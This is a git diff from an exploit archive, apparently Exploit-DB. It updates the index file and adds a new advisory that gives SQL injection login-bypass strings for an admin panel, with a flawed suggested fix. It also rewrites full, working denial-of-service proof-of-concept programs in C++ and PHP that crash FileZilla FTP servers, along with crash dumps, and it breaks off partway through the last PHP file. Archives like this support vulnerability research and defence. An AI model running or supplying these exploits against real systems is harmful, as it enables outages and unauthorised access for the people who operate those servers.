diff --git a/files.csv b/files.csv
index 6a80d0627..3dcdb5d51 100755
--- a/files.csv
+++ b/files.csv
@@ -1110,7 +1110,7 @@ id,file,description,date,author,platform,type,port
 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0
 1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143
 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80
-1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0
+1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0
 1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0
 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0
 1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0
@@ -2575,7 +2575,7 @@ id,file,description,date,author,platform,type,port
 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
-2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
+2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include Vulnerability",2006-12-09,bd0rk,php,webapps,0
@@ -2588,7 +2588,7 @@ id,file,description,date,author,platform,type,port
 2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0
 2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0
 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0
-2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
+2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 - (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0
 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0
 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0
@@ -23371,7 +23371,7 @@ id,file,description,date,author,platform,type,port
 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0
 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0
 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0
-26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0
+26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0
 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0
 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0
 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0
@@ -33455,7 +33455,7 @@ id,file,description,date,author,platform,type,port
 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0
 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
-37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve _/bin/sh_ - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
+37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ - shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
 37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0
 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
@@ -33629,7 +33629,7 @@ id,file,description,date,author,platform,type,port
 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
-37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,80
+37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
 37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
@@ -33639,7 +33639,7 @@ id,file,description,date,author,platform,type,port
 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
-37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
+37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
 37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
@@ -33649,3 +33649,6 @@ id,file,description,date,author,platform,type,port
 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
+37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
+37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
+37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
diff --git a/platforms/php/webapps/37290.txt b/platforms/php/webapps/37290.txt
new file mode 100755
index 000000000..7c95f7730
--- /dev/null
+++ b/platforms/php/webapps/37290.txt
@@ -0,0 +1,46 @@
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+|   Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability |
+|            Date: 06.13.2015                                                          |
+|   Exploit Daddy: Walid Naceri                                                        |
+| Vendor Homepage: http://milw0rm.sourceforge.net/                                     |
+|   Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download  |
+|         Version: v1.0                                                                |
+|       Tested On: Kali Linux, Mac, Windows                                            |
+|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
+| Website exploiter: WwW.security-Dz.Com                                               |
+| CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA         |
+| Sorry: Sorry pancaker, you missed that one :(                                        |
+<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+ 
+ 
+ 
+ 
+### vuln codez  admin/login.php ###
+<?
+$usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing?
+$pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer?
+if($usr && $pwd){
+$login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';");
+$row = mysql_num_rows($login);
+----Bla Bla Bla--------
+ 
+ 
+ 
+ 
+### manual ###
+Go to the login admin panel :)
+
+Exploit 1:
+USER: ADMIN' OR ''='
+PASS: ADMIN' OR ''='
+
+Exploit 2:
+USER: ADMIN' OR 1=1#
+PASS: Anything Bro :)
+
+
+
+### How to fix, learn bro some php again :) ###
+
+$usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr'])));
+$usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd'])));
\ No newline at end of file
diff --git a/platforms/windows/dos/1336.cpp b/platforms/windows/dos/1336.cpp
index 84b2933fb..3c4305a41 100755
--- a/platforms/windows/dos/1336.cpp
+++ b/platforms/windows/dos/1336.cpp
@@ -1,110 +1,110 @@
-/*
-FileZillaDoS.cpp
-FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen.
-Read the disclaimer at http://ingehenriksen.blogspot.com before using.
-Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib".
-*/
-
-#include "stdafx.h"
-#include <iostream>
-#include "Winsock2.h"
-
-#define BUFFSIZE 10000
-#define ATTACK_BUFFSIZE 5000
-
-using namespace std;
-
-int _tmain(int argc, _TCHAR* argv[])
-{
-       cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl;
-       cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." << endl;
-       if (argc!=3)                    // Exit if wrong number of arguments
-       {
-               cerr << "Error: Wrong number of arguments" << endl;
-               cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl;
-               cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl;
-               return (-1);
-       }
-
-       in_addr IPAddressData;
-       __int64 counterVal;
-       char* bufferData;
-       char* attackStringData;
-       SOCKET sock;
-       sockaddr_in sinInterface;
-
-       WSADATA wsaData;
-       int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);             // Use Winsock version 2.2
-       if (iResult != NO_ERROR)
-       {
-               cerr << "Error: WSAStartup() failed" << endl;
-               return(-1);
-       }
-
-       int recvRet;
-       char tmpBuffer[BUFFSIZE];
-       char tmpAttackBuffer[ATTACK_BUFFSIZE];
-       tmpAttackBuffer[0] = 'U';
-       tmpAttackBuffer[1] = 'S';
-       tmpAttackBuffer[2] = 'E';
-       tmpAttackBuffer[3] = 'R';
-       tmpAttackBuffer[4] = ' ';
-
-       int i;
-       int j=5;
-       for (i=j;i<ATTACK_BUFFSIZE-6;i++)
-       {
-               int k;
-               for(k=j;k<=i;k++)
-               {
-                       tmpAttackBuffer[k] = 'A';
-               }
-               tmpAttackBuffer[k] = '\n';
-               tmpAttackBuffer[k+1] = '\0';
-
-               sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP );
-               if ((int)(sock)==-1)
-               {
-                       cerr << "Error: Could not create socket" << endl;
-                       return(-1);
-               }
-
-               sinInterface.sin_family = AF_INET;
-               sinInterface.sin_addr.s_addr = inet_addr(argv[1]);
-               sinInterface.sin_port = htons(atoi(argv[2]));
-
-               if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR))
-               {
-                       int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0);
-                       cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl;
-                       if ( sendResult != SOCKET_ERROR )
-                       {
-                               recvRet = SOCKET_ERROR;
-
-                               for (int i=0;i<BUFFSIZE;i++)
-                                       tmpBuffer[i]=(char)0;
-
-                               recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 );
-                               if ( recvRet == SOCKET_ERROR )
-                                       cerr << "Error: recv() failed" << endl;
-                               else
-                                       cout << "Response is: " << endl << tmpBuffer << endl;;
-                       }
-                       else
-                               cerr << "Error: send() failed" << endl;
-
-                       if (shutdown(sock,0)==SOCKET_ERROR)
-                               cerr << "Error: shutdown() failed" << endl;
-               }
-               else
-                       cerr << "Error: connect() failed" << endl;
-
-               if (closesocket(sock)==SOCKET_ERROR)
-                       cerr << "Error: closesocket() failed" << endl;
-
-       }       // End for loop
-
-       return 0;
-}
-
-// milw0rm.com [2005-11-21]
+/*
+FileZillaDoS.cpp
+FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen.
+Read the disclaimer at http://ingehenriksen.blogspot.com before using.
+Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib".
+*/
+
+#include "stdafx.h"
+#include <iostream>
+#include "Winsock2.h"
+
+#define BUFFSIZE 10000
+#define ATTACK_BUFFSIZE 5000
+
+using namespace std;
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+       cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl;
+       cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." << endl;
+       if (argc!=3)                    // Exit if wrong number of arguments
+       {
+               cerr << "Error: Wrong number of arguments" << endl;
+               cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl;
+               cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl;
+               return (-1);
+       }
+
+       in_addr IPAddressData;
+       __int64 counterVal;
+       char* bufferData;
+       char* attackStringData;
+       SOCKET sock;
+       sockaddr_in sinInterface;
+
+       WSADATA wsaData;
+       int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);             // Use Winsock version 2.2
+       if (iResult != NO_ERROR)
+       {
+               cerr << "Error: WSAStartup() failed" << endl;
+               return(-1);
+       }
+
+       int recvRet;
+       char tmpBuffer[BUFFSIZE];
+       char tmpAttackBuffer[ATTACK_BUFFSIZE];
+       tmpAttackBuffer[0] = 'U';
+       tmpAttackBuffer[1] = 'S';
+       tmpAttackBuffer[2] = 'E';
+       tmpAttackBuffer[3] = 'R';
+       tmpAttackBuffer[4] = ' ';
+
+       int i;
+       int j=5;
+       for (i=j;i<ATTACK_BUFFSIZE-6;i++)
+       {
+               int k;
+               for(k=j;k<=i;k++)
+               {
+                       tmpAttackBuffer[k] = 'A';
+               }
+               tmpAttackBuffer[k] = '\n';
+               tmpAttackBuffer[k+1] = '\0';
+
+               sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP );
+               if ((int)(sock)==-1)
+               {
+                       cerr << "Error: Could not create socket" << endl;
+                       return(-1);
+               }
+
+               sinInterface.sin_family = AF_INET;
+               sinInterface.sin_addr.s_addr = inet_addr(argv[1]);
+               sinInterface.sin_port = htons(atoi(argv[2]));
+
+               if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR))
+               {
+                       int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0);
+                       cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl;
+                       if ( sendResult != SOCKET_ERROR )
+                       {
+                               recvRet = SOCKET_ERROR;
+
+                               for (int i=0;i<BUFFSIZE;i++)
+                                       tmpBuffer[i]=(char)0;
+
+                               recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 );
+                               if ( recvRet == SOCKET_ERROR )
+                                       cerr << "Error: recv() failed" << endl;
+                               else
+                                       cout << "Response is: " << endl << tmpBuffer << endl;;
+                       }
+                       else
+                               cerr << "Error: send() failed" << endl;
+
+                       if (shutdown(sock,0)==SOCKET_ERROR)
+                               cerr << "Error: shutdown() failed" << endl;
+               }
+               else
+                       cerr << "Error: connect() failed" << endl;
+
+               if (closesocket(sock)==SOCKET_ERROR)
+                       cerr << "Error: closesocket() failed" << endl;
+
+       }       // End for loop
+
+       return 0;
+}
+
+// milw0rm.com [2005-11-21]
diff --git a/platforms/windows/dos/2901.php b/platforms/windows/dos/2901.php
index 3245d779a..2228edebc 100755
--- a/platforms/windows/dos/2901.php
+++ b/platforms/windows/dos/2901.php
@@ -1,104 +1,104 @@
-<?php
-
-# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service
-# by rgod
-# mail: retrog at alice dot it
-# site: http://retrogod.altervista.org
-
-# tested on WinXP sp2
-
-error_reporting(E_ALL);
-
-$service_port = getservbyname('ftp', 'tcp');
-$address = gethostbyname('192.168.1.3');
-
-$user="test";
-$pass="test";
-
-$junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";
-
-$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
-if ($socket < 0) {
-   echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
-} else {
-   echo "OK.\n";
-}
-
-$result = socket_connect($socket, $address, $service_port);
-if ($result < 0) {
-   echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
-} else {
-   echo "OK.\n";
-}
-
-$out=socket_read($socket, 240);
-echo $out;
-
-$in = "USER ".$user."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-$out=socket_read($socket, 80);
-echo $out;
-
-$in = "PASS ".$pass."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-$out=socket_read($socket, 80);
-echo $out;
-
-$in = "PASV ".$junk."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-$in = "PORT ".$junk."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-$in = "STOR ".$junk."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-socket_close($socket);
-
-/*
-07:04:28.270  pid=0F84 tid=03A0  EXCEPTION (first-chance)
-              ----------------------------------------------------------------
-              Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
-              ----------------------------------------------------------------
-              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
-              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
-              ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
-              EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
-                            --> MOV BYTE PTR [ESI+7C],01
-              ----------------------------------------------------------------
-
-07:04:28.330  pid=0F84 tid=03A0  EXCEPTION (unhandled)
-              ----------------------------------------------------------------
-              Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
-              ----------------------------------------------------------------
-              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
-              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
-              ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
-              EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
-              EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
-                            --> MOV BYTE PTR [ESI+7C],01
-              ----------------------------------------------------------------
-
-07:04:28.330  pid=0F84 tid=0104  Thread exited with code 3221225477
-07:04:28.380  pid=0F84 tid=0F18  Thread exited with code 3221225477
-07:04:28.380  pid=0F84 tid=03A0  Thread exited with code 3221225477
-07:04:28.380  pid=0F84 tid=04E4  Thread exited with code 3221225477
-07:04:28.390  pid=0F84 tid=053C  Thread exited with code 3221225477
-07:04:28.390  pid=0F84 tid=0780  Process exited with code 3221225477
-
-*/
-
-?>
-
-# milw0rm.com [2006-12-09]
+<?php
+
+# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service
+# by rgod
+# mail: retrog at alice dot it
+# site: http://retrogod.altervista.org
+
+# tested on WinXP sp2
+
+error_reporting(E_ALL);
+
+$service_port = getservbyname('ftp', 'tcp');
+$address = gethostbyname('192.168.1.3');
+
+$user="test";
+$pass="test";
+
+$junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";
+
+$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+if ($socket < 0) {
+   echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
+} else {
+   echo "OK.\n";
+}
+
+$result = socket_connect($socket, $address, $service_port);
+if ($result < 0) {
+   echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
+} else {
+   echo "OK.\n";
+}
+
+$out=socket_read($socket, 240);
+echo $out;
+
+$in = "USER ".$user."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+$out=socket_read($socket, 80);
+echo $out;
+
+$in = "PASS ".$pass."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+$out=socket_read($socket, 80);
+echo $out;
+
+$in = "PASV ".$junk."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+$in = "PORT ".$junk."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+$in = "STOR ".$junk."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+socket_close($socket);
+
+/*
+07:04:28.270  pid=0F84 tid=03A0  EXCEPTION (first-chance)
+              ----------------------------------------------------------------
+              Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
+              ----------------------------------------------------------------
+              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
+              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
+              ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
+              EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
+                            --> MOV BYTE PTR [ESI+7C],01
+              ----------------------------------------------------------------
+
+07:04:28.330  pid=0F84 tid=03A0  EXCEPTION (unhandled)
+              ----------------------------------------------------------------
+              Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
+              ----------------------------------------------------------------
+              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
+              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
+              ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
+              EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
+              EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
+                            --> MOV BYTE PTR [ESI+7C],01
+              ----------------------------------------------------------------
+
+07:04:28.330  pid=0F84 tid=0104  Thread exited with code 3221225477
+07:04:28.380  pid=0F84 tid=0F18  Thread exited with code 3221225477
+07:04:28.380  pid=0F84 tid=03A0  Thread exited with code 3221225477
+07:04:28.380  pid=0F84 tid=04E4  Thread exited with code 3221225477
+07:04:28.390  pid=0F84 tid=053C  Thread exited with code 3221225477
+07:04:28.390  pid=0F84 tid=0780  Process exited with code 3221225477
+
+*/
+
+?>
+
+# milw0rm.com [2006-12-09]
diff --git a/platforms/windows/dos/2914.php b/platforms/windows/dos/2914.php
index c239ffe41..b33caba79 100755
--- a/platforms/windows/dos/2914.php
+++ b/platforms/windows/dos/2914.php
@@ -1,67 +1,67 @@
-<?php
-
-# Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service
-# by shinnai
-# mail: shinnai[at]autistici[dot[org]
-# site: http://shinnai.altervista.org
-#
-# special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html
-# and for code in php I never could write alone ;)
-# This one works fine also with an user with only read and list permissions enabled
-# you can change the LIST command also with NLST or NLST -al comamnds
-
-# tested on Windows XP Professional SP2 all patched
-
-error_reporting(E_ALL);
-
-$service_port = getservbyname('ftp', 'tcp');
-$address = gethostbyname('127.0.0.1');
-
-$user="test";
-$pass="test";
-
-$junk.="A*";
-
-$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
-if ($socket < 0) {
-  echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
-} else {
-  echo "OK.\n";
-}
-
-$result = socket_connect($socket, $address, $service_port);
-if ($result < 0) {
-  echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
-} else {
-  echo "OK.\n";
-}
-
-$out=socket_read($socket, 240);
-echo $out;
-
-$in = "USER ".$user."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-$out=socket_read($socket, 80);
-echo $out;
-
-$in = "PASS ".$pass."\r\n";
